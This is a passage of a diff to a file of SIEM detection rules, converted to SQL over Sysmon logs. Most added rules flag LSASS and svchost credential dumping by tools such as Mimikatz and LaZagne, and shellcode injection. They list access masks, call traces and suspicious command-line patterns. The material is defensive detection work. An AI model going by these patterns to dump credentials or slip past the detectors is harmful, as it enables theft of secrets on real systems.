Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 
'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace 
LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" 
], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential 
dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools 
such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files 
(x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - 
"author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE 
'\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR 
((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE 